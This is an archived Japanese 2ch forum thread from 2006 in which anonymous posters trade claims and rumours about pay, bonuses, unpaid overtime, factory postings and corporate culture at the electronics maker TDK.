5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

TDKってどーなのさ!? パート2

1 :名無しさん@3周年:2006/09/13(水) 19:26:16 ID:19ykz23e
語れ

2 :名無しさん@3周年:2006/09/13(水) 19:31:49 ID:wJaXNeID
2

3 :名無し募集中。。。:2006/09/14(木) 01:46:35 ID:Odq0VVua
秋田(゚听)イラネは若者の総意

4 :名無しさん@3周年:2006/09/14(木) 02:29:58 ID:EYToeVVz
秋田県にかほ市

5 :名無しさん@3周年:2006/09/14(木) 09:03:30 ID:EQyTxiR8
前スレ
TDKってどーなのさ!?
http://science4.2ch.net/test/read.cgi/kikai/992292843/

6 :名無しさん@3周年:2006/09/15(金) 23:20:25 ID:qkqmQePB
前スレでTDKの場合は山形が地獄!?って書いてあったけど生産部で違うと思うけど?

7 :名無しさん@3周年:2006/09/16(土) 10:47:00 ID:EjNXErZl
冬のボーナスは3ヶ月だそうです。
軽く、100満は逝きますね。
週間ダイヤモンド最新号によると、平均給料は770満円だそうです。
ちなみに平均年齢は39だそうです。
みなさんはもっともらってますか?
あるFさんは1000満もらっているそうです。
新入社員は400満ぐらいでしょうか。
25で入社して40まで15。
(770-400)/15=26
年間26満もあがる見込みはないでしょう。
つまりもらっている人は平気よりかなり多くもらっていることです。
45で1500満ぐらいでしょうか。
今年もにかほは活気があります。
やはり工場が近くにあるとやる気が違いますね。
休日出勤は進んでやるひとが多い気がします。
手当てが2万近いからでしょう。


8 :名無しさん@3周年:2006/09/16(土) 13:17:44 ID:jwwew9Kr
>7
いくわけないじゃん。
30台の後半突入超出世組の課長職でも740満ぐらいだよ。
分布、せめて標準偏差をだせ。って言わないと。
3年前、本社経営者は、これらのデータを公表するために
以下の対策を本社人事にいらい。

(1)俺らの給与を倍にしろ。
(2)新卒採用は、35、40に達するまでに半分に減らせ。
(3)中途採用は、3年でやめさせろ。

これで、超いびつな分布により、平均給与と平均年齢が決まる。
ある部門が、ある職種(最大多数の職種)の社員の平均年齢と役職、
在職年数をグラフ化。
あまりに恐ろしく、そのまま抹消。


9 :名無しさん@3周年:2006/09/16(土) 20:34:37 ID:zUyebXOR
>>7
冬のボーナスは3ヶ月だそうです。軽く、100満は逝きますね。

それどこの(tbsうちの課長でもそんなに貰えるのは一握りだが・・・

10 :無しさん@3周年:2006/09/16(土) 22:43:16 ID:LM8dW+Vo
主事クラスでもある程度がんばっていれば月40満は貰っているでしょ。
年間、800満。
ある意味、課長になれば給料が下がるかも。
残業手当がなくなるから。
俺の知り合いはキャノンに逝ったが、時給計算では下がったと泣いてたよ。





11 :名無しさん@3周年:2006/09/16(土) 23:28:14 ID:jwwew9Kr
8だが、誤解がいっぱいなので、追記。
主事で、扶養家族いっぱい。残業いっぱいなら、年収780満可能。
主査、ボーナス3ヶ月なら100満可能。
だけど、それ以外のパラメータは不可能。(平均年齢の社員)

とくにわしらの世代で、独身で、主事”穂”で秋田だと、平均年齢
に達しても、平均年収に達するのは、厳しい。昇給制度が変わったためだ!
まず、D卒、M卒ならなおさらだ。なぜか、学歴高いほうが、
年収が低いんだよ。この会社。
家族いっぱい、高卒で入社年数長いほうが、30代では給与がすごく高い。


12 :名無しさん@3周年:2006/09/17(日) 00:32:13 ID:UoUIdSIn
年功序列な給料なの?TDK

13 :名無しさん@3周年:2006/09/17(日) 13:38:37 ID:yCxk9P/r
>>12
そうらしいよ。特に、中途採用の社員が詳しい。
採用する部署のトップが、給与が高くても雇いたい人が応募にきても、
人事が、年齢で給与を抑えてしまうって。

たしかに、中途採用募集のインターネットサイトには、
給与は、、年齢、実績等を加味します。って書いてある。

わしの上司(中途採用2年目、主査)もよく嘆いていたよ。
俺(上司)よりも、部下の40代後半の製造部門から異動してきた
主事の方が給与が15%ぐらい多いって。
主査だった上司は、入社3年で再転職してたけど、
主事はまだ会社にいるみたい。
その主事も20年ほど前の中途採用。

その部署では、俺だけ新卒採用だったから、主査は、TDKの制度を
いろいろ教えてくれた。いい能力も高く、上司だったのだが、、、。

14 :名無しさん@3周年:2006/09/17(日) 14:18:53 ID:UoUIdSIn
結構、中途多いんだー

15 :名無しさん@3周年:2006/09/17(日) 21:53:05 ID:lGasuDE7
うーむ・・・うちの30代高卒ヒラで年収500は高いのか・・・

16 :名無しさん@3周年:2006/09/18(月) 03:23:06 ID:U4waC5i5
新人の俺には関係ない話しだな
3ヵ月だろうがどうでもいいわ

17 :名無しさん@3周年:2006/09/18(月) 23:20:54 ID:qvrSinRN
全ては子会社採用なのか本社採用なのかで人生が別れる。


18 :名無しさん@3周年:2006/09/19(火) 00:22:45 ID:V7xR92iU
>>8
俺新卒ですが半分まで減らせって本当ですか?
本社採用、コ会社採用でも全然待遇違う?

19 :ひらめき:2006/09/19(火) 10:19:48 ID:9Fw/ERnB
週間ダイアモンドの記事は事実だと思う。平均年収770満。
とはいっても、女性の方が年収130満から言って、かなりもらっている人がいるのが事実だろう。
扶養一人当たり、年間50満はもらえる。税金も考慮したら、年100満くらい差がつくだろう。
企業内格差は始まってるのだ。俺は下流社員だろう。結婚すれば中流になれるかもしれない。
まだあきらめるのは遅くない。
いまから、会社に行こう。

20 :名無しさん@3周年:2006/09/19(火) 23:01:54 ID:dNTUxCzp
山形、またも人員削減したくて一番遠い工場同士社員交換移動実施中

21 :20:2006/09/19(火) 23:03:36 ID:dNTUxCzp
それが嫌なら会社を辞めてパートでもやれ!と暴言まで吐いたというウワサが山形中で有名になってます

22 :名無しさん@3周年:2006/09/19(火) 23:23:39 ID:rZfOJBAx
>>19
扶養手当で50万ってどういう計算?? 詳細キボーン
嫁さん手当てで2万くらいで他に何が入るの??
秋田なら寒冷地手当て!? 燃料手当て!?
にかほにTDK親和なんとかガススタンドあるね。 社員は安く入れてるのかなぁ〜
mobil系でったぞ(本日sanyo ゴリラで検索しますたww)

23 :名無しさん@3周年:2006/09/20(水) 02:13:48 ID:JUFJSw6n
親和はたかいよ。セルフでいれたほうがいいな。
あと秋田で寒冷地手当てでない。ついでに地域手当てもゼロになる。給料はへるよ。

24 :名無しさん@3周年:2006/09/20(水) 08:49:24 ID:sMOIWRCR
まぁ、子会社だからねぇ。。。結構、ガススタもあったよ!
3km以内に10箇所くらいだとまぁまぁじゃね?
とにかく手当て関係知りたいね〜 社宅か独身寮あるあけでもかなりの手当てと思う。
普通家族もちで月8万〜10万くらいのとこに住んだら1年間で96万〜120万がただの家賃だ。
社宅8000円だっけ?独寮は5000円くらいかな? 単純計算でも年間で9.6万。
他の人より10倍も金貯めれる。実家が持ち家ならもう家を買う必要なし。
その辺も考えるとかなり良いと思われる。なんせこの業界転勤、栄転が多いんだしww

25 :名無しさん@3周年:2006/09/20(水) 22:37:52 ID:Tb0DO1hh
KO会社の由利○荘では退職者が続出し部長も辞めたそうです。
工場TOPのS部長は借金まみれで金を貸すよう組合を脅しているとのことです。
そんな会社で働いてる従業員はお気の毒。

26 :名無しさん@3周年:2006/09/21(木) 00:08:37 ID:EykL3A2C
そういえば、うちの部長も社長の嫌がらせで辞めたな・・・
総務は人員総入れ替えしたし

27 :名無しさん@3周年:2006/09/21(木) 23:16:43 ID:kHIfa025
社長って副社長のこと?? 秋田にはいろいろ工場あるけど一応、
何だかわけのわからない秋田弁で捲くし立てて泣かされてた部長がいたそうな・・。

その人??ってかもう秋田って寒いの??

28 :名無しさん@3周年:2006/09/22(金) 03:28:30 ID:KkizT2Px
副社長なんているの?

29 :名無しさん@3周年:2006/09/23(土) 00:09:53 ID:ntWY9dK8
>18
俺は直接聞いたわけじゃないが、複数の証言者がいたので確かだろう。
実際どうなのかは、入社10年先輩に聞いてみろ。
中途の人に聞くと、著名なわりに中身のない会社だったっていうよ。
でも業界(電子部品で非系列)内では、マシなほう。
子会社の待遇は知らないが、雇用主が違うのだから、違うのは当然だ。

年齢分布は、過去の四季報を図書館で調べて、社員数の増減を調べれば
変な増減を繰り返していることが分かる。
どの会社でもリクルート資料は良いことしか書いてないから、長く
勤めるつもりならきちんと自分で調査して悪いところも見つけな。

35歳、KO大M卒、入社10年、評価オールB、秋田勤務。
基本給29満、ボーナス5.9ヶ月、扶養者なし、社宅なし、地域手当なし
残業手当なし、年収計算してみろ。上の高卒とほぼ同じ。これはマジ実例。

30 :名無しさん@3周年:2006/09/23(土) 03:32:54 ID:xQ+zNHzG
就職活動している大学生です。
@四季報,過去ログを読むと給与水準が低いのですが
実際はどうなんですか?福利厚生はどうですか?
A本社部門の残業時間ってどれくらいですか?


31 :名無しさん@3周年:2006/09/23(土) 06:05:14 ID:ihQpwIsi
>>29
15だが「うーむ・・・うちの30代高卒ヒラで年収500は高いのか・・・ 」
残業、扶養手当て有りだから。なければ400+α

32 :名無しさん@3周年:2006/09/23(土) 12:43:03 ID:ntWY9dK8
手当てだろうが基本給だろうが、給与には変わりない。KO君は、一流大学で、
TDKにゆかりの深い研究室出身だったため開発部と言う名の技術サポート部隊
に配属。当然、残業つけられずこき使われ、10年後に捨てられただったよう
だ。
@過去ログの、四季報が正しい。(四季報は間違いがあると、訂正文がHPに載る)
 給与明細、就業規則をみると、能力や実績に関係ない、
 格差=@世代間+A勤務地B家族構成で ±35%の収入格差ができる。 
 これを能力、実績で補うのは困難。
 チャレンジして見てもよいが、効果が出るのは遅いし、KO君のようにこれか
らというときに自分の勤めていた工場がなくなってしまうこともあるから、賢
い奴は転職してしまう。

A本社部門といってもさまざま。
 所属先の所属コードの上位コードが数字の場合は、本社部門。
 アルファベットの場合は、事業部か研究所。
 本社部門で本社勤務の場合は、基本的に残業0時間だと聞いているが、
 入社時から本社配属は、血縁系コネ入社だけと言われている。
 研究所は、三流以下という話なので、研究職希望なら他の会社を当たれ。

33 :名無しさん@3周年:2006/09/24(日) 01:50:18 ID:YEGMvj1Z
うそを信じるな!
いいところもあるぞ。


34 :名無しさん@3周年:2006/09/24(日) 02:21:44 ID:ZlMN4F+s
>>27
今の時期は過ごしやすいと思う。多分
気温見てれば


35 :名無しさん@3周年:2006/09/24(日) 03:26:28 ID:+cCKEtu6
>>33
いいところは、少ないようですね

36 :名無しさん@3周年:2006/09/24(日) 10:47:48 ID:Uub5uLgM
>>33
例えば?

37 :名無しさん@3周年:2006/09/24(日) 11:59:09 ID:YEGMvj1Z
>>36
総務や人事に配属されると、特典一杯。
ほかの社員の福利厚生を自分に割り当ても可能。

出張好きなら、出張手当てだけで、収入が3割アップ。しかも非課税。
八幡・本社勤務なら、月給10%アップ。
組合の幹部になれば、年1回、
ヨーロッパ、アメリカ、アジアのいずれかの視察旅行付き。

32は、良い部署、良い仕事につけなかったやつの泣き言だろ。


38 :名無しさん@3周年:2006/09/24(日) 19:24:41 ID:+cCKEtu6
>>37
TDKでは、文系職種(人事、総務)が良い職種で、
技術系職種は良くない職種と言うことですか?

39 :名無しさん@3周年:2006/09/24(日) 23:59:23 ID:YEGMvj1Z
>>38
どこでも同じだろう。
技術系は、稼ぎ方知らないし、頭固杉。
営業や俺らが食わせてやっているようなものなのに、
文句ばっかりタレやがって、かなりむかつくぞ。
ここ技術系のサイトだったな、さらばだ。


40 :名無しさん@3周年:2006/09/25(月) 15:35:45 ID:idQtn716
素朴な質問。 
TDKがどうして掲示板上で「機械・工学」に分類さているのでしょうか?


41 :ないとテスター:2006/09/25(月) 18:27:56 ID:0OVwWYmf
毎年B評価とはネタだろう。マスター卒ならAはとれるはず。KO君はかなりの問題児だろう。
35なら主事になって平均でも600はかたいだろう。
Sなら50万アップもできるのだから。
こんな俺でも平均はもらってるのだから。
実際、C評価は無断欠勤が多いか、上司に嫌われるなどしないともらえない。
普通はクビだ。
部署にもよるが残業を40付けるだけで12万もらえるのだから。忙しい現場は60ぐらいつけてますよ。それだけで200マンを軽く越えるのだ。確かに普通に働けば500がいいとこかもしれないけど、頑張ればそれなりに給料をもらえる会社ですね。

42 :名無しさん@5周年:2006/09/25(月) 19:58:43 ID:VfrUHhwF
人の給料より10月の人事異動が知りたい!


43 :名無しさん@3周年:2006/09/25(月) 22:14:44 ID:eInt8njT
>>40
機械屋のバカが数年前にココにスレ立ててしまったから

44 :名無しさん@3周年:2006/09/27(水) 03:02:15 ID:FeKs42kx
秋田県にかほ市

45 :なっとう汁:2006/09/27(水) 15:19:59 ID:Jk3FtdEC
先日、成田工場に行ってきました。
成田は噂以上の国際都市でしたね。東京からかなり近かったです。
周りは昔風の田園でよかったです。
ボーナスはかなりでるみたいですね。
はやりのミニバンを買おうと思います。
アルファードが候補かな。もちろん現金払いです。
彼女とドライブに行きたいです。
彼女が早くできるといいな。組合に相談にいきます。

46 :名無しさん@3周年:2006/09/27(水) 20:45:37 ID:FeKs42kx
半分は秋田地区工場灰属ってほんと?

47 :名無しさん@3周年:2006/09/27(水) 23:15:58 ID:0VNedURT
>>32
>>41
TDKへの転職を考えていましたが、結局、一流大M卒でも、他人より
たくさん残業しなければ、年収500万程度で、しかも評価が低いという
ことですか?
所帯持ち、市川への所要時間が1.5時間の私には、月40や60時間の
残業を続けられる自身がありません。

今の会社では、法定労働時間を部下に守らせるように指導されてますが、
TDKでは、上限越えが常習化しているのでしょうか?
主事(係長?)も課長?から40時間も残業を強いられるのでしょうか?
(40付けるって、月40時間の残業をするということ?)

48 :名無しさん@3周年:2006/09/27(水) 23:59:03 ID:AKRdAA/h
セラミックコンデンサのハイエンド新商品、
最近他社に遅れを取り気味のようですが、大丈夫ですか?

49 :名無しさん@3周年:2006/09/28(木) 00:57:02 ID:fL/R9/1b
>>47
月40ごとき(ry
しかも八幡は人があふれている

50 :名無しさん@3周年:2006/09/28(木) 08:34:40 ID:ja9iArs9
>>47
10,60なんて当たり前だよ。100オーバーなんてザラ。ほとんどサービス残業だね。ただ配属される会社、部署で全然違うみたいだけど

51 :50:2006/09/28(木) 08:35:34 ID:ja9iArs9
×10,60
○40,60




52 :名無しさん@3周年:2006/09/28(木) 21:21:47 ID:Lqu8w++6
サービス残業が無いと成り立たないの?

53 :名無しさん@3周年:2006/09/28(木) 22:01:03 ID:gKDMeiK4
真面目な話、どんな会社でも一日残業2時間なら最低残業3時間は会社にいると思うが・・・
本気で細かく正確に残業つけてるって、ありなの?

54 :名無しさん@3周年:2006/09/28(木) 22:03:27 ID:8N6P54Sr
40時間の残業なら泣いて喜ぶ。
平均で120時間くらいは普通でしょ?
少なくともここ3年はそのくらいです。

55 :名無しさん@3周年:2006/09/30(土) 22:17:19 ID:JBTqpqU8
俺は月60時間のサービス残業です。トップ直々の命令で残業は付けられません。
労働○○局の監査の為に嘘の申請書は保存しているようですが・・・

56 :名無しさん@3周年:2006/10/01(日) 03:06:50 ID:M9Olk/Hb
金いらねーから7時には帰りたい
まあ金も貰ってないが

57 :名無しさん@3周年:2006/10/01(日) 04:30:40 ID:L37omMvE


58 :名無しさん@3周年:2006/10/01(日) 21:54:24 ID:PYmI9fgg
秋田県

59 :名無しさん@3周年:2006/10/01(日) 23:18:34 ID:P/in9iSJ
山形県

60 :名無しさん@3周年:2006/10/02(月) 00:13:18 ID:m/FOUcvw
>>58
>>59
大当たり

61 :名無しさん@3周年:2006/10/02(月) 02:22:54 ID:++KFEnKL
もっと徹底的にPCの電源落とした時間まで管理しろよ

62 :名無しさん@3周年:2006/10/02(月) 07:41:55 ID:tSYunQx/
東北

63 :カード:2006/10/02(月) 09:24:42 ID:V82KVQzQ
秋田は最新のタイムカードを使用してるから、サービス残業は事実上困難。
どうしても仕事をしたい人は早めにカードを入力してそのあと仕事。
たしかスマッシュというソフト。
あのソフトのおかげでだいぶ残業が減ったと、予想される。
俺は早く帰って温泉に行くのがたのしみだ。

64 :名無しさん@3周年:2006/10/02(月) 18:29:17 ID:BkkNuh5Z
月末にスマッシュを修正しないと思いますか?

65 :名無しさん@3周年:2006/10/02(月) 19:04:15 ID:zMvTs/S6
>>63
でかい釣り針ですねw

66 :名無しさん@3周年:2006/10/03(火) 00:05:56 ID:MbL5oLOH
え?

俺、サービス残業0時間だよ。
別に何も言われたこと無い。
つか、ちゃんと付けていないのか?
釣られているのか?

67 :名無しさん@3周年:2006/10/03(火) 01:58:43 ID:CvCsJDhu
>>66
何時間残業してんだよ

68 :名無しさん@3周年:2006/10/03(火) 02:59:37 ID:R0Wn1W0Y
>>66
地域採用か?

69 :名無しさん@3周年:2006/10/03(火) 13:53:10 ID:+t/c1i70
仕事がないということは使えないってこと

70 :名無しさん@3周年:2006/10/03(火) 23:47:19 ID:Oe47DLyW
村田製作所との間で迷っています。
TDKのいいところを教えてください。
技術系志望です。

71 :名無しさん@3周年:2006/10/04(水) 00:39:03 ID:UuX3RL/G
秋田に永住できる。空気がおいしい。土地が安い。

72 :名無しさん@3周年:2006/10/04(水) 07:30:52 ID:ofo789rw
村田製作所も田舎にあるので、空気がおいしいし、土地が安いです。
企業としての魅力をお願いします。

73 :名無しさん@3周年:2006/10/04(水) 21:10:12 ID:4nKY/xUB
会社にいつまでいても文句を言われない。
会社に泊まり込んでも文句を言われない。
会社に住み込んでも文句を言われない。
給料が安いので休みも会社に来ても文句を言われない。
給料が安く結婚できないので会社にずっといても文句を言われない。

74 :名無しさん@3周年:2006/10/04(水) 22:03:58 ID:bnZhdv5u
>>70
一般的に言われているのは
村田製作所はじめ多くの同業の企業が同族企業であるのに対し
TDKは同族を一切排除しているということ。
あと学閥が一切ないということ。
だそうです。
一般的に言われているのは。

75 :名無しさん@3周年:2006/10/04(水) 22:38:05 ID:A3lNVLi9
> 村田製作所はじめ多くの同業の企業が同族企業であるのに対し
> TDKは同族を一切排除しているということ

もうちょっとわかりやすくおながいします

76 :名無しさん@3周年:2006/10/04(水) 23:35:50 ID:bnZhdv5u
>>75
社長・役員などの経営陣が家族・親戚で構成されている企業のこと。
創業者=現社長の企業はその傾向がある。
創業者は会社への思い入れが強いだけにワンマンになり代替わりを拒む傾向が。
世の中のかなりの企業は同族企業だと思いますよ。
そんな中、TDKは経営陣がきちんと入れ替わっているし。
創業者=現社長の企業にだけは就職しない!って考えていた自分にとっては
いい会社なのかもしれない。
秋田はちょっとねぇ…というのはあるが。



77 :名無しさん@3周年:2006/10/04(水) 23:53:43 ID:tpd1mfxZ
村田製作所も学閥はないらしいですね
ロームは学閥がすごいらしいです

78 :名無しさん@3周年:2006/10/05(木) 00:53:04 ID:X4EMTVuP
かなりトップダウンの会社というのは本当ですか?


79 :名無しさん@3周年:2006/10/05(木) 02:48:24 ID:7hhPllRA
>>74
「一切排除」は誇張しすぎじゃないか?
現会長・社長、社外取締役は、創業者一族と縁故じゃないけど、
ほかの役員は縁故だったと思った。
少なくとも現取締役のうち二人は創業者の縁故だよ。
ちょっと前まで、役員の半分以上が縁故だった。

「部長以上の親族は、会社に入社できない。」
との決まりになっていたらしいけど、これも法律違反(職業選択の自由)
に違反しているから、実行されてない。
前号のタイムズには、創業者の(ひ?)孫の社員が写真つきで出てたよ。

縁故がない会社なんて世界中探してもないんじゃないか?
やっぱりそれなりの大企業の創業者は偉大だと思うし、資産である会社を
子孫が受けつぐことは、法律で認めれられている当然のことだと思うよ。


80 :名無しさん@3周年:2006/10/05(木) 20:54:06 ID:XtNY4hcN
15分以上サビ残するとイラつくから、もう帰る

81 :名無しさん@3周年:2006/10/06(金) 17:57:40 ID:ePox8MWg
そろそろ嫌がらせ人事(遠くの工場への移動など)による自殺者でるかな・・・
それでなくても数名が在職中、退職直後に自殺してるからな

82 :名無しさん@3周年:2006/10/06(金) 22:18:53 ID:Qs5UabN/
>>81
それって、技術の人間の話ですか?
技術で応募しようと思ってるんですが・・。

83 :名無しさん@3周年:2006/10/06(金) 22:20:12 ID:j0JGWa5y
結局TDKのいいところは同族経営じゃないってことですね

84 :名無しさん@3周年:2006/10/06(金) 23:25:22 ID:hxlmgtnS
>>83
そのかわり流動株(特に外国市場)が多く、買収されやすい。

来年の商法改正で外資、たぶん、韓国、中国系企業に買収されるぞ。
赤字体質の本体の社員は、大量解雇の可能性が高くなると思うが、
それがいいところなの?

同族系のM社とA社、TU社と○社が合併するってうわさよく聞くけど。
もしそうなったら、国内業界地位が急激落。どっかと合併しないと、
つぶれちゃうよ。
同族系は、それはそれで「完全市場任せ」じゃないところにメリットがある
から。


85 :マーシャル:2006/10/06(金) 23:45:45 ID:eT8gBNWG
明日は楽しみな運動会です。
目当ての子の前でがんばるぞ。彼女をゲットだ。
綱引きは嫌ですね。
晴れることを期待します。

86 :名無しさん@3周年:2006/10/07(土) 02:27:36 ID:owuHmeK3
>>84
M社とTU社はわかるんですがA社と○社ってどこですか?
もうちょい、ヒント下さい。

87 :名無しさん@3周年:2006/10/07(土) 09:33:01 ID:JdKo5y2g
>>82
技術じゃないよ

88 :名無しさん@3周年:2006/10/07(土) 14:54:06 ID:SgCOKd+W
アルプスとオムロン

89 :名無しさん@3周年:2006/10/07(土) 18:15:48 ID:owuHmeK3
>>88
ありがとう。

M社とA社はなんとなくイメージできますが
TU社とO社が合併するイメージが浮かばないんですけど。







90 :名無しさん@3周年:2006/10/07(土) 21:33:36 ID:uaZlylRZ
残業残業と称してパソコンの前でボーっとしているならさっさと帰ったほうが良い。

会社に長期滞在することが美徳と考えているタコが多すぎ

91 :名無しさん@3周年:2006/10/07(土) 23:18:19 ID:SxKcyy6Y
>>90
同感。時間集約的に仕事すると評価が下がるのが不思議。
だから暇人にはいい会社かも。
ところで、1日付けでしゅ事になったやからも多いと思うが、
どうして給与がこれしか上がらないの??
これなら残業つけさせてくれって言えた、補のほうがいいよ。
事の方が補よりも昇給幅が大きくなるっていう説明も??だ。
見積もったら、6年以上たってようやくメリットが出てくる。
どうせその前にまた制度改革だろう。
C、Dになったら、棒ナス減で(−)だよ。
この昇格制度、ただの釣りか?
査はもっとひどいかも。誰か教えてくれ。

92 :名無しさん@3周年:2006/10/07(土) 23:40:41 ID:NLO4NPpM
MとAはくっつかないでしょう
商品がかぶるから

93 :名無しさん@3周年:2006/10/08(日) 02:50:54 ID:yPlUXTuF
普通は商品(製品)がかぶるから合併するが。

94 :名無しさん@3周年:2006/10/08(日) 16:38:44 ID:2mMgYbHt
>>89
ていうか、O社じゃなくて○社だからw

95 :名無しさん@3周年:2006/10/08(日) 22:46:47 ID:Nm3FEzJv
>>94
MARUWA?
なわけないか

96 :旅行の思い出:2006/10/10(火) 09:53:09 ID:Outre7rw
この連休には秋田の同期のところに行った。
仁賀保駅は立派で驚いた。駅前は誰もいなかった。
タクシーで寮まで行ったが、間違って解明荘に行ったらしい。ここは役職のある人しか入れないみたいだ。どうりで豪華なつくりな訳だ。
そこから独身寮まではすぐだった。連休だからか、人は少なかった。噂よりきれいな建物だ。少しうらやましい。
マックスバリューで弁当を買って御飯を食べた。
想像してたより、にかほは都会だ。さすがにかほ市だ。秋田は素晴らしい。
そこで働く社員は世界一の幸せだろう。

97 :思い出:2006/10/10(火) 13:45:12 ID:Outre7rw
明日からまた会社だ。
楽しみだ。俺は研究員だか、主事ほや技師などもあるみたいだ。
残業も部署によってかなり差があるようだ。
同期のところは60までつけてもいいらしい。うらやましい。
年間200万近く差がでる。
これは公平なのか。
こんどナンバーが成田になるみたいだ。
ださいから、早めに車を買いたい。
ベンツとかがかっこいい。

98 :名無しさん@3周年:2006/10/11(水) 21:27:21 ID:BnXlcBpE
本八幡勤務だったら、TDKに転職したい。

99 :名無しさん@3周年:2006/10/12(木) 01:44:34 ID:YfA42i7K
やわたはかいろ

100 :成田勤務:2006/10/12(木) 17:28:52 ID:TkLmgS3h
やはり成田工場が一番だろう。
秋田より都会だし、八幡みたいに空気が悪くない。
東京にも近いし、実際土地も安いから結婚しても困らない。
事実、結婚する率は八幡より多い。

101 :名無しさん@3周年:2006/10/12(木) 20:49:19 ID:iy7OCgse
> 真面目な話、どんな会社でも一日残業2時間なら最低残業3時間は会社にいると思うが・・・
>本気で細かく正確に残業つけてるって、ありなの?

こういうのを見ると、「俺のためにただ働きしているwww」とか思っちゃう。

102 :名無しさん@3周年:2006/10/13(金) 11:07:22 ID:ixYsUUW+
天海守


103 :ファイト:2006/10/13(金) 13:00:16 ID:5prL3IDm
サービス残業をするかしないかは自己責任だと思う。俺は残業は付ける派だ。
例え装置の真空待ちだとしても会社に拘束されてる訳だし、残業だろう。

104 :名無しさん@3周年:2006/10/13(金) 19:01:40 ID:dg3bhhsU
秋田県

105 :名無しさん@3周年:2006/10/13(金) 21:21:16 ID:8ktvaLjz
>>103
うちは残業付けても申請書はそのままシュッレダーへ一直線!
今年のサービス残業は今日までで約2000時間、サービス休出50日。
さて残り2ヶ月で何時間になるのか・・・

106 :名無しさん@3周年:2006/10/13(金) 22:17:27 ID:FuhR0Ymk
>>105
TDKの話じゃないですよね。
俺の希望を摘み取らないで、転職先の最後の砦なんだから・・・

107 :名無しさん@3周年:2006/10/14(土) 00:25:08 ID:KFKBbump
>>106
今帰ってきたけど何か?
いつもより1時間ほど早い帰宅

108 :名無しさん@3周年:2006/10/14(土) 16:52:57 ID:4I5fcbAf
>>99
技術系で就職した場合
千葉で働くことができるのは全体の何%くらいでしょうか?
またどういった基準で勤務地が決定するのでしょうか?

109 :名無しさん@3周年:2006/10/14(土) 22:02:21 ID:9VsbuQev
>>108
新入社員の10〜15%くらいだな
明確な基準はない

110 :名無しさん@3周年:2006/10/15(日) 00:44:49 ID:APl267Ve
平沢工場・鳥海工場・秋田工場・象潟工場・稲倉工場(秋田県にかほ市)
(にかほ市には創業当時から多くの生産拠点が集積し、TDKの一大拠点となっている。)


111 :108:2006/10/15(日) 12:43:06 ID:PqFKS6kM
>>109
ということは技術系の社員はほとんどは秋田ですね。
ありがとうございました。参考になりました。

112 :名無しさん@3周年:2006/10/15(日) 17:07:32 ID:hutEpXZU
ヒント

・T岡
・労働基準監督署


113 :名無しさん@3周年:2006/10/15(日) 18:39:17 ID:B+KLU4tF
>>112
どれに対してのレス?
前スレから見てたんでヒントのT岡、労働基準監督署はどこなのかはわかるけど

114 :名無しさん@3周年:2006/10/16(月) 01:27:17 ID:2F4RTFAp
T岡はいいよね!社員は気さくで親切だし。
今はT岡 にいないけど・・・

115 :名無しさん@3周年:2006/10/16(月) 19:47:16 ID:DyyiDaHj
秋田から北関東辺りに移転すれば、
もっと業績のよい働きやすい会社になると思うんだけど
間違ってるかな

116 :名無しさん@3周年:2006/10/16(月) 20:48:56 ID:AU8kKDfM
ついにTDK○内に労働基準監督署がサービス残業調査に入ったらしいぞ。

117 :名無しさん@3周年:2006/10/16(月) 21:12:10 ID:fFDrmp5J
新卒総合職で職別採用しているみたいですが
花形部署、窓際部署ってなんですか?

118 :名無しさん@3周年:2006/10/18(水) 01:03:48 ID:dovdATo/
花形はヘッドじゃねーの?
ちなみに窓際は俺のいるところ

119 :ポジティブ:2006/10/18(水) 08:27:54 ID:yBzkxqSX
これからは磁石が伸びると思うよ。

120 :名無しさん@3周年:2006/10/18(水) 09:38:15 ID:gKWdkNXZ
コンデンサが一番の花形部署。希望者殺到

121 :名無しさん@3周年:2006/10/18(水) 11:40:55 ID:vsjKAypu
>>116
調査入るとどうなるの?
まあサービス残業させてる時点で労働基準監督署に出すデータは捏造だろうね

122 :名無しさん@3周年:2006/10/18(水) 20:31:35 ID:jvzU7pFT
>>121

どうもならないよ。
残業するなっていうメールが来るだけだろう。

監督署も以前お昼頃「サービス残業させてませんか?」って来たけど
そんな時間に来てわかるかっ!!夜中に来いよ!

123 :名無しさん@3周年:2006/10/21(土) 06:06:34 ID:JRTJPsth
>>116
ダチが数人そこで働いているので詳細情報聴きだしてきます。
普段からかなり愚痴をこぼしていたので面白い情報が入ると思います。

124 :117:2006/10/21(土) 16:03:53 ID:IEXSP+wf
すいません。文系の人間なので営業とか経理とかで‥
出世しやすい、仕事が楽など何でもいいです

125 :名無しさん@3周年:2006/10/22(日) 00:10:59 ID:ZNgUFkBd
文系なら上司の穴をなめとけば出世するんじゃね

126 :ドラゴン:2006/10/24(火) 12:56:55 ID:FiRRg004
理系なら特許を出すのが出世の近道。
真面目に実験をしていれば、ネタはでるけどね。
俺の時代は誰でも出世できたきど、今は大変みたいだね。

127 :名無しさん@3周年:2006/10/25(水) 00:20:13 ID:sk1wdO7t
酸化物の磁性体に未来はあるの?

128 :名無しさん@3周年:2006/10/25(水) 16:18:52 ID:2+PcqXTz
http://www.tdk.co.jp/tjaah01/aah62300.htm

Iさんどこ行ったの?

129 :名無しさん@3周年:2006/10/25(水) 23:59:18 ID:frGFMYsd
定年

130 :名無しさん@3周年:2006/10/29(日) 00:24:13 ID:3Rkb/p3E
>>124
文系でこのサイト見ている仲間がいるとはうれしい。
楽なのは、人事、総務、だがつぶしがきかず異動も転職も困難。
営業、経理、法務は、仕事がきつい。
穴場は、知財、企画室など文系が少ない部門など。
理系にいじめられる場合もあるらしいが、転職も有利。

出世したいなら、中途で入社。
文系部門はほとんど中途採用。
親分も、中間管理職も、みんな中途。

来年は久々に赤字になると思うから、よく考えてから決めろ。
いま本社では、利益の大幅下方修正をどう隠すかで、四苦八苦。
あさってのIRを見てから決めろ。


131 :名無しさん@3周年:2006/10/29(日) 12:04:29 ID:QeaO5u62
>文系でこのサイト見ている仲間がいるとはうれしい。
>楽なのは、人事、総務、だがつぶしがきかず異動も転職も困難。

確かにそうでしょうね。

>営業、経理、法務は、仕事がきつい。

経理って決算時期だけしょ。きついのは。
法務ってきついの?

>穴場は、知財、企画室など文系が少ない部門など。

知財は、理系なら確かに40、50になっても募集(転職先)ありますね。
企画室なんて一部のエリートしか行けないのでは?

>理系にいじめられる場合もあるらしいが、転職も有利。

>出世したいなら、中途で入社。
>文系部門はほとんど中途採用。
>親分も、中間管理職も、みんな中途。

>来年は久々に赤字になると思うから、よく考えてから決めろ。
>いま本社では、利益の大幅下方修正をどう隠すかで、四苦八苦。
>あさってのIRを見てから決めろ。

これってインサイダーじゃないの?
